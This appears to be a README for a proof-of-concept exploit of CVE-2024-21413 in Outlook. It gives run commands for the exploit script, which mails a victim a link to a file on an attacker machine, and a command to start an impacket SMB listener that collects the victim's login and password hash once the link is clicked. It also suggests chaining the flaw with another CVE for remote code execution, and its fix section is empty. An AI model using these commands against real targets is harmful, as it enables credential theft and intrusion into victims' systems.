python CVE-2024-21413.py -host example.com -port 25 -from [email protected] -recipient [email protected] -url xx.xx.xx.xx/path/to/shared/file/r0tb1t.rtf
Note
r00tb1t : is the shared test file (word in this case) from the attacker machine (xx.xx.xx.xx).
To ensure compliance with SPF, DKIM, and DMARC, use legitimate $IP and domain
Make sure to install the pexpect library if you haven't already using pip install pexpect
.
- Run a smb listener
impacket-smbserver -smb2support -ip 0.0.0.0 test /tmp
. - Run the POC
python CVE-2024-21413.py -host example.com -port 25 -from [email protected] -recipient [email protected] -url example.com/path/to/shared/file/r0tb1t.rtf
- Click on the link in the received mail,and BOOM you should retrieve the login & hash in the listner
- chain this CVE with CVE-2023-21716 to obtain RCE !!!
- Kudooooos & details on CVE-2024-21413 .
- Workaround/Fix:
Caution